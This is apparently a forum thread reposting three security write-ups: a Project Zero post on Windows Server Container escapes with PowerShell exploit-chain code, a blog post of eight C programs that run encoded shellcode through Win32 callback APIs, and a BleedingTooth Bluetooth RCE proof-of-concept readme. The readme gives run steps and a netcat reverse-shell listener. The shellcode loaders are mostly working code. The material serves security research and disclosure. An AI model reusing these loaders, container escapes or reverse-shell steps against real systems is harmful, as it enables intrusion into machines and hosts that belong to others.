  11. Who Contains the Containers? Posted by James Forshaw, Project Zero This is a short blog post about a research project I conducted on Windows Server Containers that resulted in four privilege escalations which Microsoft fixed in March 2021. In the post, I describe what led to this research, my research process, and insights into what to look for if you’re researching this area. Windows Containers Background Windows 10 and its server counterparts added support for application containerization. The implementation in Windows is similar in concept to Linux containers, but of course wildly different. The well-known Docker platform supports Windows containers which leads to the availability of related projects such as Kubernetes running on Windows. You can read a bit of background on Windows containers on MSDN. I’m not going to go in any depth on how containers work in Linux as very little is applicable to Windows. The primary goal of a container is to hide the real OS from an application. For example, in Docker you can download a standard container image which contains a completely separate copy of Windows. The image is used to build the container which uses a feature of the Windows kernel called a Server Silo allowing for redirection of resources such as the object manager, registry and networking. The server silo is a special type of Job object, which can be assigned to a process. The application running in the container, as far as possible, will believe it’s running in its own unique OS instance. Any changes it makes to the system will only affect the container and not the real OS which is hosting it. This allows an administrator to bring up new instances of the application easily as any system or OS differences can be hidden. For example the container could be moved between different Windows systems, or even to a Linux system with the appropriate virtualization and the application shouldn’t be able to tell the difference. Containers shouldn’t be confused with virtualization however, which provides a consistent hardware interface to the OS. A container is more about providing a consistent OS interface to applications. Realistically, containers are mainly about using their isolation primitives for hiding the real OS and providing a consistent configuration in which an application can execute. However, there’s also some potential security benefit to running inside a container, as the application shouldn’t be able to directly interact with other processes and resources on the host. There are two supported types of containers: Windows Server Containers and Hyper-V Isolated Containers. Windows Server Containers run under the current kernel as separate processes inside a server silo. Therefore a single kernel vulnerability would allow you to escape the container and access the host system. Hyper-V Isolated Containers still run in a server silo, but do so in a separate lightweight VM. You can still use the same kernel vulnerability to escape the server silo, but you’re still constrained by the VM and hypervisor. To fully escape and access the host you’d need a separate VM escape as well. The current MSRC security servicing criteria states that Windows Server Containers are not a security boundary as you still have direct access to the kernel. However, if you use Hyper-V isolation, a silo escape wouldn’t compromise the host OS directly as the security boundary is at the hypervisor level. That said, escaping the server silo is likely to be the first step in attacking Hyper-V containers meaning an escape is still useful as part of a chain. As Windows Server Containers are not a security boundary any bugs in the feature won’t result in a security bulletin being issued. Any issues might be fixed in the next major version of Windows, but they might not be. Origins of the Research Over a year ago I was asked for some advice by Daniel Prizmant, a researcher at Palo Alto Networks on some details around Windows object manager symbolic links. Daniel was doing research into Windows containers, and wanted help on a feature which allows symbolic links to be marked as global which allows them to reference objects outside the server silo. I recommend reading Daniel’s blog post for more in-depth information about Windows containers. Knowing a little bit about symbolic links I was able to help fill in some details and usage. About seven months later Daniel released a second blog post, this time describing how to use global symbolic links to escape a server silo Windows container. The result of the exploit is the user in the container can access resources outside of the container, such as files. The global symbolic link feature needs SeTcbPrivilege to be enabled, which can only be accessed from SYSTEM. The exploit therefore involved injecting into a system process from the default administrator user and running the exploit from there. Based on the blog post, I thought it could be done easier without injection. You could impersonate a SYSTEM token and do the exploit all in process. I wrote a simple proof-of-concept in PowerShell and put it up on Github. Fast forward another few months and a Googler reached out to ask me some questions about Windows Server Containers. Another researcher at Palo Alto Networks had reported to Google Cloud that Google Kubernetes Engine (GKE) was vulnerable to the issue Daniel had identified. Google Cloud was using Windows Server Containers to run Kubernetes, so it was possible to escape the container and access the host, which was not supposed to be accessible. Microsoft had not patched the issue and it was still exploitable. They hadn’t patched it because Microsoft does not consider these issues to be serviceable. Therefore the GKE team was looking for mitigations. One proposed mitigation was to enforce the containers to run under the ContainerUser account instead of the ContainerAdministrator. As the reported issue only works when running as an administrator that would seem to be sufficient. However, I wasn’t convinced there weren't similar vulnerabilities which could be exploited from a non-administrator user. Therefore I decided to do my own research into Windows Server Containers to determine if the guidance of using ContainerUser would really eliminate the risks. While I wasn’t expecting MS to fix anything I found it would at least allow me to provide internal feedback to the GKE team so they might be able to better mitigate the issues. It also establishes a rough baseline of the risks involved in using Windows Server Containers. It’s known to be problematic, but how problematic? Research Process The first step was to get some code running in a representative container. Nothing that had been reported was specific to GKE, so I made the assumption I could just run a local Windows Server Container. Setting up your own server silo from scratch is undocumented and almost certainly unnecessary. When you enable the Container support feature in Windows, the Hyper-V Host Compute Service is installed. This takes care of setting up both Hyper-V and process isolated containers. The API to interact with this service isn’t officially documented, however Microsoft has provided public wrappers (with scant documentation), for example this is the Go wrapper. Realistically it’s best to just use Docker which takes the MS provided Go wrapper and implements the more familiar Docker CLI. While there’s likely to be Docker-specific escapes, the core functionality of a Windows Docker container is all provided by Microsoft so would be in scope. Note, there are two versions of Docker: Enterprise which is only for server systems and Desktop. I primarily used Desktop for convenience. As an aside, MSRC does not count any issue as crossing a security boundary where being a member of the Hyper-V Administrators group is a prerequisite. Using the Hyper-V Host Compute Service requires membership of the Hyper-V Administrators group. However Docker runs at sufficient privilege to not need the user to be a member of the group. Instead access to Docker is gated by membership of the separate docker-users group. If you get code running under a non-administrator user that has membership of the docker-users group you can use that to get full administrator privileges by abusing Docker’s server silo support. Fortunately for me most Windows Docker images come with .NET and PowerShell installed so I could use my existing toolset. I wrote a simple docker file containing the following: FROM mcr.microsoft.com/windows/servercore:20H2 USER ContainerUser COPY NtObjectManager c:/NtObjectManager CMD [ "powershell", "-noexit", "-command", \ "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ] This docker file will download a Windows Server Core 20H2 container image from the Microsoft Container Registry, copy in my NtObjectManager PowerShell module and then set up a command to load that module on startup. I also specified that the PowerShell process would run as the user ContainerUser so that I could test the mitigation assumptions. If you don’t specify a user it’ll run as ContainerAdministrator by default. Note, when using process isolation mode the container image version must match the host OS. This is because the kernel is shared between the host and the container and any mismatch between the user-mode code and the kernel could result in compatibility issues. Therefore if you’re trying to replicate this you might need to change the name for the container image. Create a directory and copy the contents of the docker file to the filename dockerfile in that directory. Also copy in a copy of my PowerShell module into the same directory under the NtObjectManager directory. Then in a command prompt in that directory run the following commands to build and run the container. C:\container> docker build -t test_image . Step 1/4 : FROM mcr.microsoft.com/windows/servercore:20H2 ---> b29adf5cd4f0 Step 2/4 : USER ContainerUser ---> Running in ac03df015872 Removing intermediate container ac03df015872 ---> 31b9978b5f34 Step 3/4 : COPY NtObjectManager c:/NtObjectManager ---> fa42b3e6a37f Step 4/4 : CMD [ "powershell", "-noexit", "-command", "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ] ---> Running in 86cad2271d38 Removing intermediate container 86cad2271d38 ---> e7d150417261 Successfully built e7d150417261 Successfully tagged test_image:latest C:\container> docker run --isolation=process -it test_image PS> I wanted to run code using process isolation rather than in Hyper-V isolation, so I needed to specify the --isolation=process argument. This would allow me to more easily see system interactions as I could directly debug container processes if needed. For example, you can use Process Monitor to monitor file and registry access. Docker Enterprise uses process isolation by default, whereas Desktop uses Hyper-V isolation. I now had a PowerShell console running inside the container as ContainerUser. A quick way to check that it was successful is to try and find the CExecSvc process, which is the Container Execution Agent service. This service is used to spawn your initial PowerShell console. PS> Get-Process -Name CExecSvc Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName ------- ------ ----- ----- ------ -- -- ----------- 86 6 1044 5020 4560 6 CExecSvc With a running container it was time to start poking around to see what’s available. The first thing I did was dump the ContainerUser’s token just to see what groups and privileges were assigned. You can use the Show-NtTokenEffective command to do that. PS> Show-NtTokenEffective -User -Group -Privilege USER INFORMATION ---------------- Name Sid ---- --- User Manager\ContainerUser S-1-5-93-2-2 GROUP SID INFORMATION ----------------- Name Attributes ---- ---------- Mandatory Label\High Mandatory Level Integrity, ... Everyone Mandatory, ... BUILTIN\Users Mandatory, ... NT AUTHORITY\SERVICE Mandatory, ... CONSOLE LOGON Mandatory, ... NT AUTHORITY\Authenticated Users Mandatory, ... NT AUTHORITY\This Organization Mandatory, ... NT AUTHORITY\LogonSessionId_0_10357759 Mandatory, ... LOCAL Mandatory, ... User Manager\AllContainers Mandatory, ... PRIVILEGE INFORMATION --------------------- Name Luid Enabled ---- ---- ------- SeChangeNotifyPrivilege 00000000-00000017 True SeImpersonatePrivilege 00000000-0000001D True SeCreateGlobalPrivilege 00000000-0000001E True SeIncreaseWorkingSetPrivilege 00000000-00000021 False The groups didn’t seem that interesting, however looking at the privileges we have SeImpersonatePrivilege. If you have this privilege you can impersonate any other user on the system including administrators. MSRC considers having SeImpersonatePrivilege as administrator equivalent, meaning if you have it you can assume you can get to administrator. Seems ContainerUser is not quite as normal as it should be. That was a very bad (or good) start to my research. The prior assumption was that running as ContainerUser would not grant administrator privileges, and therefore the global symbolic link issue couldn’t be directly exploited. However that turns out to not be the case in practice. As an example you can use the public RogueWinRM exploit to get a SYSTEM token as long as WinRM isn’t enabled, which is the case on most Windows container images. There are no doubt other less well known techniques to achieve the same thing. The code which creates the user account is in CExecSvc, which is code owned by Microsoft and is not specific to Docker. NextI used the NtObject drive provider to list the object manager namespace. For example checking the Device directory shows what device objects are available. PS> ls NtObject:\Device Name TypeName ---- -------- Ip SymbolicLink Tcp6 SymbolicLink Http Directory Ip6 SymbolicLink ahcache SymbolicLink WMIDataDevice SymbolicLink LanmanDatagramReceiver SymbolicLink Tcp SymbolicLink LanmanRedirector SymbolicLink DxgKrnl SymbolicLink ConDrv SymbolicLink Null SymbolicLink MailslotRedirector SymbolicLink NamedPipe Device Udp6 SymbolicLink VhdHardDisk{5ac9b14d-61f3-4b41-9bbf-a2f5b2d6f182} SymbolicLink KsecDD SymbolicLink DeviceApi SymbolicLink MountPointManager Device ... Interestingly most of the device drivers are symbolic links (almost certainly global) instead of being actual device objects. But there are a few real device objects available. Even the VHD disk volume is a symbolic link to a device outside the container. There’s likely to be some things lurking in accessible devices which could be exploited, but I was still in reconnaissance mode. What about the registry? The container should be providing its own Registry hives and so there shouldn’t be anything accessible outside of that. After a few tests I noticed something very odd. PS> ls HKLM:\SOFTWARE | Select-Object Name Name ---- HKEY_LOCAL_MACHINE\SOFTWARE\Classes HKEY_LOCAL_MACHINE\SOFTWARE\Clients HKEY_LOCAL_MACHINE\SOFTWARE\DefaultUserEnvironment HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft HKEY_LOCAL_MACHINE\SOFTWARE\ODBC HKEY_LOCAL_MACHINE\SOFTWARE\OpenSSH HKEY_LOCAL_MACHINE\SOFTWARE\Policies HKEY_LOCAL_MACHINE\SOFTWARE\RegisteredApplications HKEY_LOCAL_MACHINE\SOFTWARE\Setup HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node PS> ls NtObject:\REGISTRY\MACHINE\SOFTWARE | Select-Object Name Name ---- Classes Clients DefaultUserEnvironment Docker Inc. Intel Macromedia Microsoft ODBC OEM OpenSSH Partner Policies RegisteredApplications Windows WOW6432Node The first command is querying the local machine SOFTWARE hive using the built-in Registry drive provider. The second command is using my module’s object manager provider to list the same hive. If you look closely the list of keys is different between the two commands. Maybe I made a mistake somehow? I checked some other keys, for example the user hive attachment point: PS> ls NtObject:\REGISTRY\USER | Select-Object Name Name ---- .DEFAULT S-1-5-19 S-1-5-20 S-1-5-21-426062036-3400565534-2975477557-1001 S-1-5-21-426062036-3400565534-2975477557-1001_Classes S-1-5-21-426062036-3400565534-2975477557-1003 S-1-5-18 PS> Get-NtSid Name Sid ---- --- User Manager\ContainerUser S-1-5-93-2-2 No, it still looked wrong. The ContainerUser’s SID is S-1-5-93-2-2, you’d expect to see a loaded hive for that user SID. However you don’t see one, instead you see S-1-5-21-426062036-3400565534-2975477557-1001 which is the SID of the user outside the container. Something funny was going on. However, this behavior is something I’ve seen before. Back in 2016 I reported a bug with application hives where you couldn’t open the \REGISTRY\A attachment point directly, but you could if you opened \REGISTRY then did a relative open to A. It turns out that by luck my registry enumeration code in the module’s drive provider uses relative opens using the native system calls, whereas the PowerShell built-in uses absolute opens through the Win32 APIs. Therefore, this was a manifestation of a similar bug: doing a relative open was ignoring the registry overlays and giving access to the real hive. This grants a non-administrator user access to any registry key on the host, as long as ContainerUser can pass the key’s access check. You could imagine the host storing some important data in the registry which the container can now read out, however using this to escape the container would be hard. That said, all you need to do is abuse SeImpersonatePrivilege to get administrator access and you can immediately start modifying the host’s registry hives. The fact that I had two bugs in less than a day was somewhat concerning, however at least that knowledge can be applied to any mitigation strategy. I thought I should dig a bit deeper into the kernel to see what else I could exploit from a normal user. A Little Bit of Reverse Engineering While just doing basic inspection has been surprisingly fruitful it was likely to need some reverse engineering to shake out anything else. I know from previous experience on Desktop Bridge how the registry overlays and object manager redirection works when combined with silos. In the case of Desktop Bridge it uses application silos rather than server silos but they go through similar approaches. The main enforcement mechanism used by the kernel to provide the container’s isolation is by calling a function to check whether the process is in a silo and doing something different based on the result. I decided to try and track down where the silo state was checked and see if I could find any misuse. You’d think the kernel would only have a few functions which would return the current silo state. Unfortunately you’d be wrong, the following is a short list of the functions I checked: IoGetSilo, IoGetSiloParameters, MmIsSessionInCurrentServerSilo, OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO, ObGetSiloRootDirectoryPath, ObpGetSilosRootDirectory, PsGetCurrentServerSilo, PsGetCurrentServerSiloGlobals, PsGetCurrentServerSiloName, PsGetCurrentSilo, PsGetEffectiveServerSilo, PsGetHostSilo, PsGetJobServerSilo, PsGetJobSilo, PsGetParentSilo, PsGetPermanentSiloContext, PsGetProcessServerSilo, PsGetProcessSilo, PsGetServerSiloActiveConsoleId, PsGetServerSiloGlobals, PsGetServerSiloServiceSessionId, PsGetServerSiloState, PsGetSiloBySessionId, PsGetSiloContainerId, PsGetSiloContext, PsGetSiloIdentifier, PsGetSiloMonitorContextSlot, PsGetThreadServerSilo, PsIsCurrentThreadInServerSilo, PsIsHostSilo, PsIsProcessInAppSilo, PsIsProcessInSilo, PsIsServerSilo, PsIsThreadInSilo Of course that’s not a comprehensive list of functions, but those are the ones that looked the most likely to either return the silo and its properties or check if something was in a silo. Checking the references to these functions wasn’t going to be comprehensive, for various reasons: We’re only checking for bad checks, not the lack of a check. The kernel has the structure type definition for the Job object which contains the silo, so the call could easily be inlined. We’re only checking the kernel, many of these functions are exported for driver use so could be called by other kernel components that we’re not looking at. The first issue I found was due to a call to PsIsCurrentThreadInServerSilo. I noticed a reference to the function inside CmpOKToFollowLink which is a function that’s responsible for enforcing symlink checks in the registry. At a basic level, registry symbolic links are not allowed to traverse from an untrusted hive to a trusted hive. For example if you put a symbolic link in the current user’s hive which redirects to the local machine hive the CmpOKToFollowLink will return FALSE when opening the key and the operation will fail. This prevents a user planting symbolic links in their hive and finding a privileged application which will write to that location to elevate privileges. BOOLEAN CmpOKToFollowLink(PCMHIVE SourceHive, PCMHIVE TargetHive) { if (PsIsCurrentThreadInServerSilo() || !TargetHive || TargetHive == SourceHive) { return TRUE; } if (SourceHive->Flags.Trusted) return FALSE; // Check trust list. } Looking at CmpOKToFollowLink we can see where PsIsCurrentThreadInServerSilo is being used. If the current thread is in a server silo then all links are allowed between any hives. The check for the trusted state of the source hive only happens after this initial check so is bypassed. I’d speculate that during development the registry overlays couldn’t be marked as trusted so a symbolic link in an overlay would not be followed to a trusted hive it was overlaying, causing problems. Someone presumably added this bypass to get things working, but no one realized they needed to remove it when support for trusted overlays was added. To exploit this in a container I needed to find a privileged kernel component which would write to a registry key that I could control. I found a good primitive inside Win32k for supporting FlickInfo configuration (which seems to be related in some way to touch input, but it’s not documented). When setting the configuration Win32k would create a known key in the current user’s hive. I could then redirect the key creation to the local machine hive allowing creation of arbitrary keys in a privileged location. I don’t believe this primitive could be directly combined with the registry silo escape issue but I didn’t investigate too deeply. At a minimum this would allow a non-administrator user to elevate privileges inside a container, where you could then use registry silo escape to write to the host registry. The second issue was due to a call to OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO. This function would get the root object manager namespace directory for a silo. POBJECT_DIRECTORY OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO(PEJOB Silo) { if (Silo) { PPSP_STORAGE Storage = Silo->Storage; PPSP_SLOT Slot = Storage->Slot[PsObjectDirectorySiloContextSlot]; if (Slot->Present) return Slot->Value; } return ObpRootDirectoryObject; } We can see that the function will extract a storage parameter from the passed-in silo, if present it will return the value of the slot. If the silo is NULL or the slot isn’t present then the global root directory stored in ObpRootDirectoryObject is returned. When the server silo is set up the slot is populated with a new root directory so this function should always return the silo root directory rather than the real global root directory. This code seems perfectly fine, if the server silo is passed in it should always return the silo root object directory. The real question is, what silo do the callers of this function actually pass in? We can check that easily enough, there are only two callers and they both have the following code. PEJOB silo = PsGetCurrentSilo(); Root = OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO(silo); Okay, so the silo is coming from PsGetCurrentSilo. What does that do? PEJOB PsGetCurrentSilo() { PETHREAD Thread = PsGetCurrentThread(); PEJOB silo = Thread->Silo; if (silo == (PEJOB)-3) { silo = Thread->Tcb.Process->Job; while(silo) { if (silo->JobFlags & EJOB_SILO) { break; } silo = silo->ParentJob; } } return silo; } A silo can be associated with a thread, through impersonation or as can be one job in the hierarchy of jobs associated with a process. This function first checks if the thread is in a silo. If not, signified by the -3 placeholder, it searches for any job in the job hierarchy for the process for anything which has the JOB_SILO flag set. If a silo is found, it’s returned from the function, otherwise NULL would be returned. This is a problem, as it’s not explicitly checking for a server silo. I mentioned earlier that there are two types of silo, application and server. While creating a new server silo requires administrator privileges, creating an application silo requires no privileges at all. Therefore to trick the object manager to using the root directory all we need to do is: Create an application silo. Assign it to a process. Fully access the root of the object manager namespace. This is basically a more powerful version of the global symlink vulnerability but requires no administrator privileges to function. Again, as with the registry issue you’re still limited in what you can modify outside of the containers based on the token in the container. But you can read files on disk, or interact with ALPC ports on the host system. The exploit in PowerShell is pretty straightforward using my toolchain: PS> $root = Get-NtDirectory "\" PS> $root.FullPath \ PS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory PS> Set-NtProcessJob $silo -Current PS> $root.FullPath \Silos\748 To test the exploit we first open the current root directory object and then print its full path as the kernel sees it. Even though the silo root isn’t really a root directory the kernel makes it look like it is by returning a single backslash as the path. We then create the application silo using the New-NtJob command. You need to specify NoSiloRootDirectory to prevent the code trying to create a root directory which we don’t want and can’t be done from a non-administrator account anyway. We can then assign the application silo to the process. Now we can check the root directory path again. We now find the root directory is really called \Silos\748 instead of just a single backslash. This is because the kernel is now using the root root directory. At this point you can access resources on the host through the object manager. Chaining the Exploits We can now combine these issues together to escape the container completely from ContainerUser. First get hold of an administrator token through something like RogueWinRM, you can then impersonate it due to having SeImpersonatePrivilege. Then you can use the object manager root directory issue to access the host’s service control manager (SCM) using the ALPC port to create a new service. You don’t even need to copy an executable outside the container as the system volume for the container is an accessible device on the host we can just access. As far as the host’s SCM is concerned you’re an administrator and so it’ll grant you full access to create an arbitrary service. However, when that service starts it’ll run in the host, not in the container, removing all restrictions. One quirk which can make exploitation unreliable is the SCM’s RPC handle can be cached by the Win32 APIs. If any connection is made to the SCM in any part of PowerShell before installing the service you will end up accessing the container’s SCM, not the hosts. To get around this issue we can just access the RPC service directly using NtObjectManager’s RPC commands. PS> $imp = $token.Impersonate() PS> $sym_path = "$env:SystemDrive\symbols" PS> mkdir $sym_path | Out-Null PS> $services_path = "$env:SystemRoot\system32\services.exe" PS> $cmd = 'cmd /C echo "Hello World" > \hello.txt' # You can also use the following to run a container based executable. #$cmd = Use-NtObject($f = Get-NtFile -Win32Path "demo.exe") { # "\\.\GLOBALROOT" + $f.FullPath #} PS> Get-Win32ModuleSymbolFile -Path $services_path -OutPath $sym_path PS> $rpc = Get-RpcServer $services_path -SymbolPath $sym_path | Select-RpcServer -InterfaceId '367abb81-9844-35f1-ad32-98f038001003' PS> $client = Get-RpcClient $rpc PS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory PS> Set-NtProcessJob $silo -Current PS> Connect-RpcClient $client -EndpointPath ntsvcs PS> $scm = $client.ROpenSCManagerW([NullString]::Value, ` [NullString]::Value, ` [NtApiDotNet.Win32.ServiceControlManagerAccessRights]::CreateService) PS> $service = $client.RCreateServiceW($scm.p3, "GreatEscape", "", ` [NtApiDotNet.Win32.ServiceAccessRights]::Start, 0x10, 0x3, 0, $cmd, ` [NullString]::Value, $null, $null, 0, [NullString]::Value, $null, 0) PS> $client.RStartServiceW($service.p15, 0, $null) For this code to work it’s expected you have an administrator token in the $token variable to impersonate. Getting that token is left as an exercise for the reader. When you run it in a container the result should be the file hello.txt written to the root of the host’s system drive. Getting the Issues Fixed I have some server silo escapes, now what? I would prefer to get them fixed, however as already mentioned MSRC servicing criteria pointed out that Windows Server Containers are not a supported security boundary. I decided to report the registry symbolic link issue immediately, as I could argue that was something which would allow privilege escalation inside a container from a non-administrator. This would fit within the scope of a normal bug I’d find in Windows, it just required a special environment to function. This was issue 2120 which was fixed in February 2021 as CVE-2021-24096. The fix was pretty straightforward, the call to PsIsCurrentThreadInServerSilo was removed as it was presumably redundant. The issue with ContainerUser having SeImpersonatePrivilege could be by design. I couldn’t find any official Microsoft or Docker documentation describing the behavior so I was wary of reporting it. That would be like reporting that a normal service account has the privilege, which is by design. So I held off on reporting this issue until I had a better understanding of the security expectations. The situation with the other two silo escapes was more complicated as they explicitly crossed an undefended boundary. There was little point reporting them to Microsoft if they wouldn’t be fixed. There would be more value in publicly releasing the information so that any users of the containers could try and find mitigating controls, or stop using Windows Server Container for anything where untrusted code could ever run. After much back and forth with various people in MSRC a decision was made. If a container escape works from a non-administrator user, basically if you can access resources outside of the container, then it would be considered a privilege escalation and therefore serviceable. This means that Daniel’s global symbolic link bug which kicked this all off still wouldn’t be eligible as it required SeTcbPrivilege which only administrators should be able to get. It might be fixed at some later point, but not as part of a bulletin. I reported the three other issues (the ContainerUser issue was also considered to be in scope) as 2127, 2128 and 2129. These were all fixed in March 2021 as CVE-2021-26891, CVE-2021-26865 and CVE-2021-26864 respectively. Microsoft has not changed the MSRC servicing criteria at the time of writing. However, they will consider fixing any issue which on the surface seems to escape a Windows Server Container but doesn’t require administrator privileges. It will be classed as an elevation of privilege. Conclusions The decision by Microsoft to not support Windows Server Containers as a security boundary looks to be a valid one, as there’s just so much attack surface here. While I managed to get four issues fixed I doubt that they’re the only ones which could be discovered and exploited. Ideally you should never run untrusted workloads in a Windows Server Container, but then it also probably shouldn’t provide remotely accessible services either. The only realistic use case for them is for internally visible services with little to no interactions with the rest of the world. The official guidance for GKE is to not use Windows Server Containers in hostile multi-tenancy scenarios. This is covered in the GKE documentation here. Obviously, the recommended approach is to use Hyper-V isolation. That moves the needle and Hyper-V is at least a supported security boundary. However container escapes are still useful as getting full access to the hosting VM could be quite important in any successful escape. Not everyone can run Hyper-V though, which is why GKE isn't currently using it. Sursa: https://googleprojectzero.blogspot.com/2021/04/who-contains-containers.html
  12. Executing Shellcode via Callbacks What is a Callback Function? In simple terms, it’s a function that is called through a function pointer. When we pass a function pointer to the parameter where the callback function is required, once that function pointer is used to call that function it points to it’s said that a call back is made. This can be abused to pass shellcode instead of a function pointer. This has been around a long time and there are so many Win32 APIs we can use to execute shellcode. This article contains few APIs that I have tested and are working on Windows 10. Analyzing an API For example, let’s take the function EnumWindows from user32.dll. The first parameter lpEnumFunc is a pointer to a callback function of type WNDENUMPROC. 1 2 3 4 BOOL EnumWindows( WNDENUMPROC lpEnumFunc, LPARAM lParam ); The function passes the parameters to an internal function called EnumWindowsWorker. The first parameter which is the callback function pointer is called inside this function making it possible to pass position independent shellcode. By checking the references, we can see that other APIs use EnumWindowsWorker function making them suitable candidates for executing shellcode. EnumFonts 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 #include <Windows.h> /* * https://osandamalith.com - @OsandaMalith */ int main() { int shellcode[] = { 015024551061,014333060543,012124454524,06034505544, 021303073213,021353206166,03037505460,021317057613, 021336017534,0110017564,03725105776,05455607444, 025520441027,012701636201,016521267151,03735105760, 0377400434,032777727074 }; DWORD oldProtect = 0; BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect); EnumFonts(GetDC(0), (LPCWSTR)0, (FONTENUMPROC)(char *)shellcode, 0); } EnumFontFamilies 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 #include <Windows.h> /* * https://osandamalith.com - @OsandaMalith */ int main() { int shellcode[] = { 015024551061,014333060543,012124454524,06034505544, 021303073213,021353206166,03037505460,021317057613, 021336017534,0110017564,03725105776,05455607444, 025520441027,012701636201,016521267151,03735105760, 0377400434,032777727074 }; DWORD oldProtect = 0; BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect); EnumFontFamilies(GetDC(0), (LPCWSTR)0, (FONTENUMPROC)(char *)shellcode,0); } EnumFontFamiliesEx 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 #include <Windows.h> /* * https://osandamalith.com - @OsandaMalith */ int main() { int shellcode[] = { 015024551061,014333060543,012124454524,06034505544, 021303073213,021353206166,03037505460,021317057613, 021336017534,0110017564,03725105776,05455607444, 025520441027,012701636201,016521267151,03735105760, 0377400434,032777727074 }; DWORD oldProtect = 0; BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect); EnumFontFamiliesEx(GetDC(0), 0, (FONTENUMPROC)(char *)shellcode, 0, 0); } EnumDisplayMonitors 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 #include <Windows.h> /* * https://osandamalith.com - @OsandaMalith */ int main() { int shellcode[] = { 015024551061,014333060543,012124454524,06034505544, 021303073213,021353206166,03037505460,021317057613, 021336017534,0110017564,03725105776,05455607444, 025520441027,012701636201,016521267151,03735105760, 0377400434,032777727074 }; DWORD oldProtect = 0; BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect); EnumDisplayMonitors((HDC)0,(LPCRECT)0,(MONITORENUMPROC)(char *)shellcode,(LPARAM)0); } LineDDA 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 #include <Windows.h> /* * https://osandamalith.com - @OsandaMalith */ int main() { int shellcode[] = { 015024551061,014333060543,012124454524,06034505544, 021303073213,021353206166,03037505460,021317057613, 021336017534,0110017564,03725105776,05455607444, 025520441027,012701636201,016521267151,03735105760, 0377400434,032777727074 }; DWORD oldProtect = 0; BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect); LineDDA(10, 11, 12, 14, (LINEDDAPROC)(char *)shellcode, 0); } GrayString 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 #include <Windows.h> /* * https://osandamalith.com - @OsandaMalith */ int main() { int shellcode[] = { 015024551061,014333060543,012124454524,06034505544, 021303073213,021353206166,03037505460,021317057613, 021336017534,0110017564,03725105776,05455607444, 025520441027,012701636201,016521267151,03735105760, 0377400434,032777727074 }; DWORD oldProtect = 0; BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect); GrayString(0, 0, (GRAYSTRINGPROC)(char *)shellcode, 1, 2, 3, 4, 5, 6); } CallWindowProc 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 #include <Windows.h> /* * https://osandamalith.com - @OsandaMalith */ int main() { int shellcode[] = { 015024551061,014333060543,012124454524,06034505544, 021303073213,021353206166,03037505460,021317057613, 021336017534,0110017564,03725105776,05455607444, 025520441027,012701636201,016521267151,03735105760, 0377400434,032777727074 }; DWORD oldProtect = 0; BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect); CallWindowProc((WNDPROC)(char *)shellcode, (HWND)0, 0, 0, 0); } EnumResourceTypes 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 #include <Windows.h> /* * https://osandamalith.com - @OsandaMalith */ int main() { int shellcode[] = { 015024551061,014333060543,012124454524,06034505544, 021303073213,021353206166,03037505460,021317057613, 021336017534,0110017564,03725105776,05455607444, 025520441027,012701636201,016521267151,03735105760, 0377400434,032777727074 }; DWORD oldProtect = 0; BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect); EnumResourceTypes(0, (ENUMRESTYPEPROC)(char *)shellcode, 0); } You can check this repo by my friends @bofheaded & @0xhex21 for other callback APIs. Sursa: https://osandamalith.com/2021/04/01/executing-shellcode-via-callbacks/
      • 1
      • Thanks
  13. BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution This Proof-Of-Concept demonstrates the exploitation of CVE-2020-12351 and CVE-2020-12352. Technical details Technical details about the exploit is available at writeup.md. Usage Compile it using: $ gcc -o exploit exploit.c -lbluetooth and execute it as: $ sudo ./exploit target_mac source_ip source_port In another terminal, run: $ nc -lvp 1337 exec bash -i 2>&0 1>&0 If successful, a calc can be spawned with: export XAUTHORITY=/run/user/1000/gdm/Xauthority export DISPLAY=:0 gnome-calculator This Proof-Of-Concept has been tested against a Dell XPS 15 running Ubuntu 20.04.1 LTS with: 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux The success rate of the exploit is estimated at 80%. Credits Andy Nguyen (theflow@) Sursa; https://google.github.io/security-research/pocs/linux/bleedingtooth/
      • 1
      • Upvote
